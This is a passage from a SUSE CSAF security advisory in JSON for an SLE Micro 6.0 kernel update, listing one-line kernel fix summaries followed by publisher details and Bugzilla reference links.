power_supply_changed() (git-fixes).\n- power: supply: rt9467: Prevent using uninitialized local variable in rt9467_set_value_from_ranges() (git-fixes).\n- power: supply: rt9467: Return error on failure in rt9467_set_value_from_ranges() (git-fixes).\n- power: supply: sbs-battery: Fix use-after-free in power_supply_changed() (git-fixes).\n- power: supply: wm831x: Check wm831x_set_bits() return value (git-fixes).\n- power: supply: wm97xx: Fix NULL pointer dereference in power_supply_changed() (git-fixes).\n- powercap: fix race condition in register_control_type() (stable-fixes).\n- powercap: fix sscanf() error return value handling (stable-fixes).\n- powercap: intel_rapl_tpmi: Remove FW_BUG from invalid version check (git-fixes).\n- powerpc/64s/slb: Fix SLB multihit issue during SLB preload (bac#1236022 ltc#211187).\n- powerpc/addnote: Fix overflow on 32-bit builds (bsc#1215199).\n- powerpc/eeh: fix recursive pci_lock_rescan_remove locking in EEH event handling (bsc#1253262 ltc#216029).\n- powerpc/kexec: Enable SMT before waking offline CPUs (bsc#1214285 bsc#1205462 bsc#1253739 bsc#1254244).\n- pwm: bcm2835: Make sure the channel is enabled after pwm_request() (git-fixes).\n- rapidio: replace rio_free_net() with kfree() in rio_scan_alloc_net() (git-fixes).\n- regmap: Fix race condition in hwspinlock irqsave routine (git-fixes).\n- regmap: maple: free entry on mas_store_gfp() failure (stable-fixes).\n- regulator: core: Protect regulator_supply_alias_list with regulator_list_mutex (git-fixes).\n- regulator: core: disable supply if enabling main regulator fails (git-fixes).\n- regulator: core: fix locking in regulator_resolve_supply() error path (git-fixes).\n- regulator: core: move supply check earlier in set_machine_constraints() (git-fixes).\n- remove a bpf CVE change which is already part of the base kernel\n- remove an Intel CPU model change which is already part of the base kernel\n- reset: fix BIT macro reference (stable-fixes).\n- rpm/mkspec-dtb: add riscv64 dtb-thead subpackage\n- rpmsg: core: fix race in driver_override_show() and use core helper (git-fixes).\n- rpmsg: glink: fix rpmsg device leak (git-fixes).\n- rtc: gamecube: Check the return value of ioremap() (git-fixes).\n- rtc: interface: Alarm race handling should not discard preceding error (git-fixes).\n- rtc: zynqmp: correct frequency value (stable-fixes).\n- sched: Increase sched_tick_remote timeout (bsc#1254510).\n- scripts/python/git_sort/git_sort.yaml: add cifs for-next repository\n- scripts: obsapi: Support URL trailing / in oscrc\n- scripts: teaapi: Add paging\n- scripts: uploader: Fix no change condition for _maintainership.json\n- scripts: uploader: Handle missing upstream in is_pr_open\n- scrits: teaapi: Add list_repos\n- scsi: lpfc: Add capability to register Platform Name ID to fabric (bsc#1254119).\n- scsi: lpfc: Allow support for BB credit recovery in point-to-point topology (bsc#1254119).\n- scsi: lpfc: Ensure unregistration of rpis for received PLOGIs (bsc#1254119).\n- scsi: lpfc: Fix leaked ndlp krefs when in point-to-point topology (bsc#1254119).\n- scsi: lpfc: Fix reusing an ndlp that is marked NLP_DROPPED during FLOGI (bsc#1254119).\n- scsi: lpfc: Modify kref handling for Fabric Controller ndlps (bsc#1254119).\n- scsi: lpfc: Remove redundant NULL ptr assignment in lpfc_els_free_iocb() (bsc#1254119).\n- scsi: lpfc: Revise discovery related function headers and comments (bsc#1254119).\n- scsi: lpfc: Rework lpfc_sli4_fcf_rr_next_index_get() (bsc#1256861).\n- scsi: lpfc: Update lpfc version to 14.4.0.12 (bsc#1254119).\n- scsi: lpfc: Update lpfc version to 14.4.0.13 (bsc#1256861).\n- scsi: lpfc: Update various NPIV diagnostic log messaging (bsc#1254119).\n- scsi: qla2xxx: Add Speed in SFP print information (bsc#1256863).\n- scsi: qla2xxx: Add bsg interface to support firmware img validation (bsc#1256863).\n- scsi: qla2xxx: Add load flash firmware mailbox support for 28xxx (bsc#1256863).\n- scsi: qla2xxx: Add support for 64G SFP speed (bsc#1256863).\n- scsi: qla2xxx: Allow recovery for tape devices (bsc#1256863).\n- scsi: qla2xxx: Delay module unload while fabric scan in progress (bsc#1256863).\n- scsi: qla2xxx: Fix bsg_done() causing double free (bsc#1256863).\n- scsi: qla2xxx: Free sp in error path to fix system crash (bsc#1256863).\n- scsi: qla2xxx: Query FW again before proceeding with login (bsc#1256863).\n- scsi: qla2xxx: Update version to 10.02.10.100-k (bsc#1256863).\n- scsi: qla2xxx: Validate MCU signature before executing MBC 03h (bsc#1256863).\n- scsi: qla2xxx: Validate sp before freeing associated memory (bsc#1256863).\n- scsi: storvsc: Process unsupported MODE_SENSE_10 (bsc#1257296).\n- selftests/bpf: Skip timer cases when bpf_timer is not supported (git-fixes).\n- serial: 8250: 8250_omap.c: Clear DMA RX running status only after DMA termination is done (stable-fixes).\n- serial: 8250_dw: handle clock enable errors in runtime_resume (stable-fixes).\n- serial: 8250_pci: Fix broken RS485 for F81504/508/512 (git-fixes).\n- serial: SH_SCI: improve \"DMA support\" prompt (git-fixes).\n- serial: add support of CPCI cards (stable-fixes).\n- serial: amba-pl011: prefer dma_mapping_error() over explicit address checking (git-fixes).\n- serial: imx: change SERIAL_IMX_CONSOLE to bool (git-fixes).\n- serial: sprd: Return -EPROBE_DEFER when uart clock is not ready (stable-fixes).\n- shrink_slab_memcg: clear_bits of skipped shrinkers (bsc#1256564).\n- slimbus: core: fix OF node leak on registration failure (git-fixes).\n- slimbus: core: fix device reference leak on report present (git-fixes).\n- slimbus: core: fix of_slim_get_device() kernel doc (git-fixes).\n- slimbus: core: fix runtime PM imbalance on report present (git-fixes).\n- slimbus: ngd: Fix reference count leak in qcom_slim_ngd_notify_slaves (git-fixes).\n- smb3: add missing null server pointer check (git-fixes).\n- smb: change return type of cached_dir_lease_break() to bool (git-fixes).\n- smb: client: ensure open_cached_dir_by_dentry() only returns valid cfid (git-fixes).\n- smb: client: fix cifs_pick_channel when channel needs reconnect (git-fixes).\n- smb: client: fix warning when reconnecting channel (git-fixes).\n- smb: client: introduce close_cached_dir_locked() (git-fixes).\n- smb: client: remove unused fid_lock (git-fixes).\n- smb: client: short-circuit in open_cached_dir_by_dentry() if !dentry (git-fixes).\n- smb: client: split cached_fid bitfields to avoid shared-byte RMW races (bsc#1250748,bsc#1257154).\n- smb: client: update cfid-\u003elast_access_time in open_cached_dir_by_dentry() (git-fixes).\n- smb: improve directory cache reuse for readdir operations (bsc#1252712).\n- smc91x: fix broken irq-context in PREEMPT_RT (git-fixes).\n- soc/tegra: fuse: speedo-tegra210: Update speedo IDs (git-fixes).\n- soc: amlogic: canvas: fix device leak on lookup (git-fixes).\n- soc: mediatek: svs: Fix memory leak in svs_enable_debug_write() (git-fixes).\n- soc: qcom: cmd-db: Use devm_memremap() to fix memory leak in cmd_db_dev_probe (git-fixes).\n- soc: qcom: ocmem: fix device leak on lookup (git-fixes).\n- soc: qcom: smem: fix hwspinlock resource leak in probe error paths (git-fixes).\n- soc: qcom: smem: handle ENOMEM error during probe (git-fixes).\n- soc: ti: k3-socinfo: Fix regmap leak on probe failure (git-fixes).\n- soc: ti: pruss: Fix double free in pruss_clk_mux_setup() (git-fixes).\n- soundwire: dmi-quirks: add mapping for Avell B.ON (OEM rebranded of NUC15) (stable-fixes).\n- spi-geni-qcom: initialize mode related registers to 0 (stable-fixes).\n- spi-geni-qcom: use xfer-\u003ebits_per_word for can_dma() (stable-fixes).\n- spi: amlogic-spifc-a1: Handle devm_pm_runtime_enable() errors (git-fixes).\n- spi: bcm63xx: drop wrong casts in probe() (git-fixes).\n- spi: bcm63xx: fix premature CS deassertion on RX-only transactions (git-fixes).\n- spi: fsl-cpm: Check length parity before switching to 16 bit mode (git-fixes).\n- spi: imx: keep dma request disabled before dma transfer setup (stable-fixes).\n- spi: spi-mem: Limit octal DTR constraints to octal DTR situations (stable-fixes).\n- spi: spi-mem: Protect dirmap_create() with spi_mem_access_start/end (stable-fixes).\n- spi: spi-sprd-adi: Fix double free in probe error path (git-fixes).\n- spi: sprd-adi: switch to use spi_alloc_host() (stable-fixes).\n- spi: sprd: adi: Use devm_register_restart_handler() (stable-fixes).\n- spi: stm32: fix Overrun issue at \u0026lt; 8bpw (stable-fixes).\n- spi: tegra114: Preserve SPI mode bits in def_command1_reg (git-fixes).\n- spi: tegra210-qspi: Remove cache operations (git-fixes)\n- spi: tegra210-quad: Add support for internal DMA (git-fixes)\n- spi: tegra210-quad: Check hardware status on timeout (bsc#1253155)\n- spi: tegra210-quad: Fix timeout handling (bsc#1253155)\n- spi: tegra210-quad: Fix timeout handling (git-fixes).\n- spi: tegra210-quad: Move curr_xfer read inside spinlock (bsc#1257952)\n- spi: tegra210-quad: Move curr_xfer read inside spinlock (git-fixes).\n- spi: tegra210-quad: Protect curr_xfer assignment in (bsc#1257952)\n- spi: tegra210-quad: Protect curr_xfer assignment in tegra_qspi_setup_transfer_one (git-fixes).\n- spi: tegra210-quad: Protect curr_xfer check in IRQ handler (bsc#1257952)\n- spi: tegra210-quad: Protect curr_xfer check in IRQ handler (git-fixes).\n- spi: tegra210-quad: Protect curr_xfer clearing in (bsc#1257952)\n- spi: tegra210-quad: Protect curr_xfer clearing in tegra_qspi_non_combined_seq_xfer (git-fixes).\n- spi: tegra210-quad: Protect curr_xfer in tegra_qspi_combined_seq_xfer (bsc#1257952)\n- spi: tegra210-quad: Protect curr_xfer in tegra_qspi_combined_seq_xfer (git-fixes).\n- spi: tegra210-quad: Refactor error handling into helper functions (bsc#1253155)\n- spi: tegra210-quad: Return IRQ_HANDLED when timeout already processed (bsc#1257952)\n- spi: tegra210-quad: Return IRQ_HANDLED when timeout already processed transfer (git-fixes).\n- spi: tegra210-quad: Update dummy sequence configuration (git-fixes)\n- spi: tegra: Fix a memory leak in tegra_slink_probe() (git-fixes).\n- spi: wpcm-fiu: Fix potential NULL pointer dereference in wpcm_fiu_probe() (git-fixes).\n- spi: wpcm-fiu: Fix uninitialized res (git-fixes).\n- spi: wpcm-fiu: Simplify with dev_err_probe() (stable-fixes).\n- spi: wpcm-fiu: Use devm_platform_ioremap_resource_byname() (stable-fixes).\n- spi: xilinx: increase number of retries before declaring stall (stable-fixes).\n- staging: fbtft: core: fix potential memory leak in fbtft_probe_common() (git-fixes).\n- staging: rtl8723bs: fix memory leak on failure path (stable-fixes).\n- staging: rtl8723bs: fix null dereference in find_network (git-fixes).\n- staging: rtl8723bs: fix out-of-bounds read in OnBeacon ESR IE parsing (stable-fixes).\n- staging: rtl8723bs: fix out-of-bounds read in rtw_get_ie() parser (stable-fixes).\n- supported.conf: Mark lan 743x supported (jsc#PED-14571)\n- thermal: int340x: Fix sysfs group leak on DLVR registration failure (stable-fixes).\n- thunderbolt: Add support for Intel Wildcat Lake (stable-fixes).\n- tools/power cpupower: Reset errno before strtoull() (stable-fixes).\n- tools/power/x86/intel-speed-select: Fix file descriptor leak in isolate_cpus() (git-fixes).\n- tpm: st33zp24: Fix missing cleanup on get_burstcount() error (git-fixes).\n- tpm: tpm_i2c_infineon: Fix locality leak on get_burstcount() failure (git-fixes).\n- tracing: Fix access to trace_event_file (bsc#1254373).\n- uacce: ensure safe queue release with state management (git-fixes).\n- uacce: fix cdev handling in the cleanup path (git-fixes).\n- uacce: fix isolate sysfs check condition (git-fixes).\n- uacce: implement mremap in uacce_vm_ops to return -EPERM (git-fixes).\n- uio: uio_fsl_elbc_gpcm:: Add null pointer check to uio_fsl_elbc_gpcm_probe (git-fixes).\n- usb: bdc: fix sleep during atomic (git-fixes).\n- usb: cdns3: Fix double resource release in cdns3_pci_probe (git-fixes).\n- usb: chaoskey: fix locking for O_NONBLOCK (git-fixes).\n- usb: chipidea: udc: limit usb request length to max 16KB (stable-fixes).\n- usb: core: add USB_QUIRK_NO_BOS for devices that hang on BOS descriptor (stable-fixes).\n- usb: dwc2: disable platform lowlevel hw resources during shutdown (stable-fixes).\n- usb: dwc2: fix hang during shutdown if set as peripheral (git-fixes).\n- usb: dwc2: fix hang during suspend if set as peripheral (git-fixes).\n- usb: dwc2: fix resume failure if dr_mode is host (git-fixes).\n- usb: dwc3: Abort suspend on soft disconnect failure (git-fixes).\n- usb: dwc3: Check for USB4 IP_NAME (stable-fixes).\n- usb: dwc3: Fix race condition between concurrent dwc3_remove_requests() call paths (git-fixes).\n- usb: dwc3: keep susphy enabled during exit to avoid controller faults (git-fixes).\n- usb: dwc3: of-simple: fix clock resource leak in dwc3_of_simple_probe (git-fixes).\n- usb: dwc3: pci: Sort out the Intel device IDs (stable-fixes).\n- usb: dwc3: pci: add support for the Intel Nova Lake -S (stable-fixes).\n- usb: gadget: configfs: Correctly set use_os_string at bind (git-fixes).\n- usb: gadget: f_eem: Fix memory leak in eem_unwrap (git-fixes).\n- usb: gadget: lpc32xx_udc: fix clock imbalance in error path (git-fixes).\n- usb: gadget: renesas_usbf: Handle devm_pm_runtime_enable() errors (git-fixes).\n- usb: gadget: tegra-xudc: Add handling for BLCG_COREPLL_PWRDN (git-fixes).\n- usb: gadget: tegra-xudc: Always reinitialize data toggle when clear halt (git-fixes).\n- usb: ohci-nxp: Use helper function devm_clk_get_enabled() (stable-fixes).\n- usb: ohci-nxp: fix device leak on probe failure (git-fixes).\n- usb: phy: Initialize struct usb_phy list_head (git-fixes).\n- usb: phy: isp1301: fix non-OF device reference imbalance (git-fixes).\n- usb: raw-gadget: cap raw_io transfer length to KMALLOC_MAX_SIZE (git-fixes).\n- usb: raw-gadget: do not limit transfer length (git-fixes).\n- usb: renesas_usbhs: Fix a resource leak in usbhs_pipe_malloc() (git-fixes).\n- usb: storage: Fix memory leak in USB bulk transport (git-fixes).\n- usb: storage: sddr55: Reject out-of-bound new_pba (stable-fixes).\n- usb: typec: tipd: Clear interrupts first (git-fixes).\n- usb: typec: ucsi: Handle incorrect num_connectors capability (stable-fixes).\n- usb: typec: ucsi: psy: Set max current to zero when disconnected (git-fixes).\n- usb: uas: fix urb unmapping issue when the uas device is remove during ongoing data transfer (git-fixes).\n- usb: udc: Add trace event for usb_gadget_set_state (stable-fixes).\n- usb: usb-storage: Maintain minimal modifications to the bcdDevice range (git-fixes).\n- usb: usb-storage: No additional quirks need to be added to the EL-R12 optical drive (stable-fixes).\n- usb: vhci-hcd: Prevent suspending virtually attached devices (git-fixes).\n- usb: xhci: limit run_graceperiod for only usb 3.0 devices (stable-fixes).\n- usbip: Fix locking bug in RT-enabled kernels (stable-fixes).\n- usbnet: limit max_mtu based on device\u0027s hard_mtu (git-fixes).\n- via_wdt: fix critical boot hang due to unnamed resource allocation (stable-fixes).\n- virtio_console: fix order of fields cols and rows (stable-fixes).\n- w1: fix redundant counter decrement in w1_attach_slave_device() (git-fixes).\n- w1: therm: Fix off-by-one buffer overflow in alarms_store (git-fixes).\n- watchdog: imx7ulp_wdt: handle the nowayout option (stable-fixes).\n- watchdog: wdat_wdt: Fix ACPI table leak in probe function (git-fixes).\n- wifi: ath10k: fix dma_free_coherent() pointer (git-fixes).\n- wifi: ath10k: fix lock protection in ath10k_wmi_event_peer_sta_ps_state_chg() (stable-fixes).\n- wifi: ath10k: sdio: add missing lock protection in ath10k_sdio_fw_crashed_dump() (git-fixes).\n- wifi: ath11k: add pm quirk for Thinkpad Z13/Z16 Gen1 (stable-fixes).\n- wifi: ath11k: fix peer HE MCS assignment (git-fixes).\n- wifi: ath11k: restore register window after global reset (git-fixes).\n- wifi: ath12k: fix dma_free_coherent() pointer (git-fixes).\n- wifi: ath12k: fix preferred hardware mode calculation (stable-fixes).\n- wifi: ath9k: debug.h: fix kernel-doc bad lines and struct ath_tx_stats (git-fixes).\n- wifi: ath9k: fix kernel-doc warnings in common-debug.h (git-fixes).\n- wifi: avoid kernel-infoleak from struct iw_point (git-fixes).\n- wifi: brcmfmac: Add DMI nvram filename quirk for Acer A1 840 tablet (stable-fixes).\n- wifi: cfg80211: Fix bitrate calculation overflow for HE rates (stable-fixes).\n- wifi: cfg80211: Fix use_for flag update on BSS refresh (git-fixes).\n- wifi: cfg80211: cancel rfkill_block work in wiphy_unregister() (git-fixes).\n- wifi: cfg80211: sme: store capped length in __cfg80211_connect_result() (git-fixes).\n- wifi: cfg80211: stop NAN and P2P in cfg80211_leave (git-fixes).\n- wifi: cfg80211: wext: fix IGTK key ID off-by-one (git-fixes).\n- wifi: cw1200: Fix potential memory leak in cw1200_bh_rx_helper() (git-fixes).\n- wifi: ieee80211: correct FILS status codes (git-fixes).\n- wifi: iwlegacy: add missing mutex protection in il3945_store_measurement() (stable-fixes).\n- wifi: iwlegacy: add missing mutex protection in il4965_store_tx_power() (stable-fixes).\n- wifi: iwlwifi: mvm: check the validity of noa_len (stable-fixes).\n- wifi: libertas: fix WARNING in usb_tx_block (stable-fixes).\n- wifi: mac80211: bounds-check link_id in ieee80211_ml_reconfiguration (git-fixes).\n- wifi: mac80211: collect station statistics earlier when disconnect (stable-fixes).\n- wifi: mac80211: correctly check if CSA is active (stable-fixes).\n- wifi: mac80211: correctly decode TTLM with default link map (git-fixes).\n- wifi: mac80211: do not increment crypto_tx_tailroom_needed_cnt twice (stable-fixes).\n- wifi: mac80211: do not use old MBSSID elements (git-fixes).\n- wifi: mac80211: fix CMAC functions not handling errors (git-fixes).\n- wifi: mac80211: fix NULL pointer dereference in mesh_rx_csa_frame() (git-fixes).\n- wifi: mac80211: ocb: skip rx_no_sta when interface is not joined (stable-fixes).\n- wifi: mac80211: restore non-chanctx injection behaviour (git-fixes).\n- wifi: mt76: Fix DTS power-limits on little endian systems (git-fixes).\n- wifi: mwifiex: Fix a loop in mwifiex_update_ampdu_rxwinsize() (git-fixes).\n- wifi: nl80211: vendor-cmd: intel: fix a blank kernel-doc line warning (git-fixes).\n- wifi: radiotap: reject radiotap with unknown bits (git-fixes).\n- wifi: rsi: Fix memory corruption due to not set vif driver data size (git-fixes).\n- wifi: rtl818x: Fix potential memory leaks in rtl8180_init_rx_ring() (git-fixes).\n- wifi: rtl818x: rtl8187: Fix potential buffer underflow in rtl8187_rx_cb() (git-fixes).\n- wifi: rtl8xxxu: fix slab-out-of-bounds in rtl8xxxu_sta_add (git-fixes).\n- wifi: rtlwifi: 8192cu: fix tid out of range in rtl92cu_tx_fill_desc() (git-fixes).\n- wifi: rtw88: 8822b: Avoid WARNING in rtw8822b_config_trx_mode() (stable-fixes).\n- wifi: rtw88: Add USB ID 2001:3329 for D-Link AC13U rev. A1 (stable-fixes).\n- wifi: rtw88: Fix alignment fault in rtw_core_enable_beacon() (git-fixes).\n- wifi: rtw88: fix DTIM period handling when conf-\u003edtim_period is zero (stable-fixes).\n- wifi: rtw88: limit indirect IO under powered off for RTL8822CS (git-fixes).\n- wifi: rtw88: rtw8821cu: Add ID for Mercusys MU6H (stable-fixes).\n- wifi: rtw89: pci: restore LDO setting after device resume (stable-fixes).\n- wifi: rtw89: wow: add reason codes for disassociation in WoWLAN mode (stable-fixes).\n- wifi: wlcore: ensure skb headroom before skb_push (stable-fixes).\n- workqueue: mark power efficient workqueue as unbounded if (bsc#1257891)\n- x86/hyperv: Fix APIC ID and VP index confusion in hv_snp_boot_ap() (git-fixes).\n- x86/microcode/AMD: Add TSA microcode SHAs (bsc#1256528).\n- x86/microcode/AMD: Add Zen5 model 0x44, stepping 0x1 minrev (bsc#1256528).\n- x86/microcode/AMD: Add more known models to entry sign checking (bsc#1256528).\n- x86/microcode/AMD: Add some forgotten models to the SHA check (bsc#1256528).\n- x86/microcode/AMD: Clean the cache if update did not load microcode (bsc#1256528).\n- x86/microcode/AMD: Extend the SHA check to Zen5, block loading of any unreleased standalone Zen5 microcode patches (bsc#1256528).\n- x86/microcode/AMD: Fix Entrysign revision check for Zen5/Strix Halo (bsc#1256528).\n- x86/microcode/AMD: Fix __apply_microcode_amd()\u0027s return value (bsc#1256528).\n- x86/microcode/AMD: Limit Entrysign signature checking to known generations (bsc#1256528).\n- x86/microcode/AMD: Load only SHA256-checksummed patches (bsc#1256528).\n- x86/microcode/AMD: Select which microcode patch to load (bsc#1256528).\n- x86/microcode/AMD: Use sha256() instead of init/update/final (bsc#1256528).\n- x86/microcode: Fix Entrysign revision check for Zen1/Naples (bsc#1256528).\n- x86: make page fault handling disable interrupts properly (git-fixes).\n- xhci: dbgtty: fix device unregister (git-fixes).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-SLE-Micro-6.0-kernel-295",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_20845-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:20845-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620845-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:20845-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024994.html"
},
{
"category": "self",
"summary": "SUSE Bug 1012628",
"url": "https://bugzilla.suse.com/1012628"
},
{
"category": "self",
"summary": "SUSE Bug 1065729",
"url": "https://bugzilla.suse.com/1065729"
},
{
"category": "self",
"summary": "SUSE Bug 1194869",
"url": "https://bugzilla.suse.com/1194869"
},
{
"category": "self",
"summary": "SUSE Bug 1205462",
"url": "https://bugzilla.suse.com/1205462"
},
{
"category": "self",
"summary": "SUSE Bug 1214285",
"url": "https://bugzilla.suse.com/1214285"
},
{
"category": "self",
"summary": "SUSE Bug 1214635",
"url": "https://bugzilla.suse.com/1214635"
},
{
"category": "self",
"summary": "SUSE Bug 1214847",
"url": "https://bugzilla.suse.com/1214847"
},
{
"category": "self",
"summary": "SUSE Bug 1215146",
"url": "https://bugzilla.suse.com/1215146"
},
{
"category": "self",
"summary": "SUSE Bug 1215199",
"url": "https://bugzilla.suse.com/1215199"
},
{
"category": "self",
"summary": "SUSE Bug 1215211",
"url": "https://bugzilla.suse.com/1215211"
},
{
"category": "self",
"summary": "SUSE Bug 1215344",
"url": "https://bugzilla.suse.com/1215344"
},
{
"category": "self",
"summary": "SUSE Bug 1216062",
"url": "https://bugzilla.suse.com/1216062"
},
{
"category": "self",
"summary": "SUSE Bug 1216436",
"url": "https://bugzilla.suse.com/1216436"
},
{
"category": "self",
"summary": "SUSE Bug 1219165",
"url": "https://bugzilla.suse.com/1219165"
},
{
"category": "self",
"summary": "SUSE Bug 1220419",
"url": "https://bugzilla.suse.com/1220419"
},
{
"category": "self",
"summary": "SUSE Bug 1223731",
"url": "https://bugzilla.suse.com/1223731"
},
{
"category": "self",
"summary": "SUSE Bug 1223800",
"url": "https://bugzilla.suse.com/1223800"
},
{
"category": "self",
"summary": "SUSE Bug 1228490",
"url": "https://bugzilla.suse.com/1228490"
},
{
"category": "self",
"summary": "SUSE Bug 1233563",
"url": "https://bugzilla.suse.com/1233563"
},
{
"category": "self",
"summary": "SUSE Bug 1233640",
"url": "https://bugzilla.suse.com/1233640"
},
{
"category": "self",
"summary": "SUSE Bug 1234163",
"url": "https://bugzilla.suse.com/1234163"
},
{
"category": "self",
"summary": "SUSE Bug 1234842",
"url": "https://bugzilla.suse.com/1234842"
},
{
"category": "self",
"summary": "SUSE Bug 1236022",
"url": "https://bugzilla.suse.com/1236022"
},
{
"category": "self",
"summary": "SUSE Bug 1241345",
"url": "https://bugzilla.suse.com/1241345"
},
{
"category": "self",
"summary": "SUSE Bug 1241437",
"url": "https://bugzilla.suse.com/1241437"
},
{
"category": "self",
"summary": "SUSE Bug 1242909",
"url": "https://bugzilla.suse.com/1242909"
},
{
"category": "self",
"summary": "SUSE Bug 1243055",
"url": "https://bugzilla.suse.com/1243055"
},
{
"category": "self",
"summary": "SUSE Bug 1243677",
"url": "https://bugzilla.suse.com/1243677"
},
{
"category": "self",
"summary": "SUSE Bug 1243678",
"url": "https://bugzilla.suse.com/1243678"
},
{
"category": "self",
"summary": "SUSE Bug 1245193",
"url": "https://bugzilla.suse.com/1245193"
},
{
"category": "self",
"summary": "SUSE Bug 1245449",
"url": "https://bugzilla.suse.com/1245449"
},
{
"category": "self",
"summary": "SUSE Bug 1246184",
"url": "https://bugzilla.suse.com/1246184"
},
{
"category": "self",
"summary": "SUSE Bug 1246328",
"url": "https://bugzilla.suse.com/1246328"
},
{
"category": "self",
"summary": "SUSE Bug 1246447",
"url": "https://bugzilla.suse.com/1246447"
},
{
"category": "self",
"summary": "SUSE Bug 1247030",
"url": "https://bugzilla.suse.com/1247030"
},
{
"category": "self",
"summary": "SUSE Bug 1247500",
"url": "https://bugzilla.suse.com/1247500"
},
{
"category": "self",
"summary": "SUSE Bug 1247712",
"url": "https://bugzilla.suse.com/1247712"
},
{
"category": "self",
"summary": "SUSE Bug 1248211",
"url": "https://bugzilla.suse.com/1248211"
},
{
"category": "self",
"summary": "SUSE Bug 1248886",
"url": "https://bugzilla.suse.com/1248886"
},
{
"category": "self",
"summary": "SUSE Bug 1249256",
"url": "https://bugzilla.suse.com/1249256"
},
{
"category": "self",
"summary": "SUSE Bug 1249307",
"url": "https://bugzilla.suse.com/1249307"
},
{
"category": "self",
"summary": "SUSE Bug 1249587",
"url": "https://bugzilla.suse.com/1249587"
},
{
"category": "self",
"summary": "SUSE Bug 1250032",
"url": "https://bugzilla.suse.com/1250032"
},
{
"category": "self",
"summary": "SUSE Bug 1250082",
"url": "https://bugzilla.suse.com/1250082"
},
{
"category": "self",
"summary": "SUSE Bug 1250334",
"url": "https://bugzilla.suse.com/1250334"
},
{
"category": "self",
"summary": "SUSE Bug 1250388",
"url": "https://bugzilla.suse.com/1250388"
},
{
"category": "self",
"summary": "SUSE Bug 1250705",
"url": "https://bugzilla.suse.com/1250705"
},
{
"category": "self",
"summary": "SUSE Bug 1250748",
"url": "https://bugzilla.suse.com/1250748"
},
{
"category": "self",
"summary": "SUSE Bug 1251966",
"url": "https://bugzilla.suse.com/1251966"
},
{
"category": "self",
"summary": "SUSE Bug 1252046",
"url": "https://bugzilla.suse.com/1252046"
},
{
"category": "self",
"summary": "SUSE Bug 1252342",
"url": "https://bugzilla.suse.com/1252342"
},
{
"category": "self",
"summary": "SUSE Bug 1252511",
"url": "https://bugzilla.suse.com/1252511"
},
{
"category": "self",
"summary": "SUSE Bug 1252686",
"url": "https://bugzilla.suse.com/1252686"
},
{
"category": "self",
"summary": "SUSE Bug 1252712",
"url": "https://bugzilla.suse.com/1252712"
},
{
"category": "self",
"summary": "SUSE Bug 1252776",
"url": "https://bugzilla.suse.com/1252776"
},
{
"category": "self",
"summary": "SUSE Bug 1252808",
"url": "https://bugzilla.suse.com/1252808"
},
{
"category": "self",
"summary": "SUSE Bug 1252824",
"url": "https://bugzilla.suse.com/1252824"
},
{
"category": "self",
"summary": "SUSE Bug 1252861",
"url": "https://bugzilla.suse.com/1252861"
},
{
"category": "self",
"summary": "SUSE Bug 1252891",
"url": "https://bugzilla.suse.com/1252891"
},
{
"category": "self",
"summary": "SUSE Bug 1252900",
"url": "https://bugzilla.suse.com/1252900"
},
{
"category": "self",
"summary": "SUSE Bug 1252911",
"url": "https://bugzilla.suse.com/1252911"
},
{
"category": "self",
"summary": "SUSE Bug 1252919",
"url": "https://bugzilla.suse.com/1252919"
},
{
"category": "self",
"summary": "SUSE Bug 1252924",
"url": "https://bugzilla.suse.com/1252924"
},
{
"category": "self",
"summary": "SUSE Bug 1252973",
"url": "https://bugzilla.suse.com/1252973"
},
{
"category": "self",
"summary": "SUSE Bug 1253087",
"url": "https://bugzilla.suse.com/1253087"
},
{
"category": "self",
"summary": "SUSE Bug 1253155",
"url": "https://bugzilla.suse.com/1253155"
},
{
"category": "self",
"summary": "SUSE Bug 1253262",
"url": "https://bugzilla.suse.com/1253262"
},
{
"category": "self",
"summary": "SUSE Bug 1253342",
"url": "https://bugzilla.suse.com/1253342"
},
{
"category": "self",
"summary": "SUSE Bug 1253365",
"url": "https://bugzilla.suse.com/1253365"
},
{
"category": "self",
"summary": "SUSE Bug 1253386",
"url": "https://bugzilla.suse.com/1253386"
},
{
"category": "self",
"summary": "SUSE Bug 1253400",
"url": "https://bugzilla.suse.com/1253400"
},
{
"category": "self",
"summary": "SUSE Bug 1253402",
"url": "https://bugzilla.suse.com/1253402"
},
{
"category": "self",
"summary": "SUSE Bug 1253408",
"url": "https://bugzilla.suse.com/1253408"
},
{
"category": "self",
"summary": "SUSE Bug 1253413",
"url": "https://bugzilla.suse.com/1253413"
},
{
"category": "self",
"summary": "SUSE Bug 1253442",
"url": "https://bugzilla.suse.com/1253442"
},
{
"category": "self",
"summary": "SUSE Bug 1253451",
"url": "https://bugzilla.suse.com/1253451"
},
{
"category": "self",
"summary": "SUSE Bug 1253458",
"url": "https://bugzilla.suse.com/1253458"
},
{
"category": "self",
"summary": "SUSE Bug 1253463",
"url": "https://bugzilla.suse.com/1253463"
},
{
"category": "self",
"summary": "SUSE Bug 1253622",
"url": "https://bugzilla.suse.com/1253622"
},
{
"category": "self",
"summary": "SUSE Bug 1253623",
"url": "https://bugzilla.suse.com/1253623"
},
{
"category": "self",
"summary": "SUSE Bug 1253647",
"url": "https://bugzilla.suse.com/1253647"
},
{
"category": "self",
"summary": "SUSE Bug 1253691",
"url": "https://bugzilla.suse.com/1253691"
},
{
"category": "self",
"summary": "SUSE Bug 1253739",
"url": "https://bugzilla.suse.com/1253739"
},
{
"category": "self",
"summary": "SUSE Bug 1254119",
"url": "https://bugzilla.suse.com/1254119"
},
{
"category": "self",
"summary": "SUSE Bug 1254126",
"url": "https://bugzilla.suse.com/1254126"
},
{
"category": "self",
"summary": "SUSE Bug 1254244",
"url": "https://bugzilla.suse.com/1254244"
},
{
"category": "self",
"summary": "SUSE Bug 1254373",
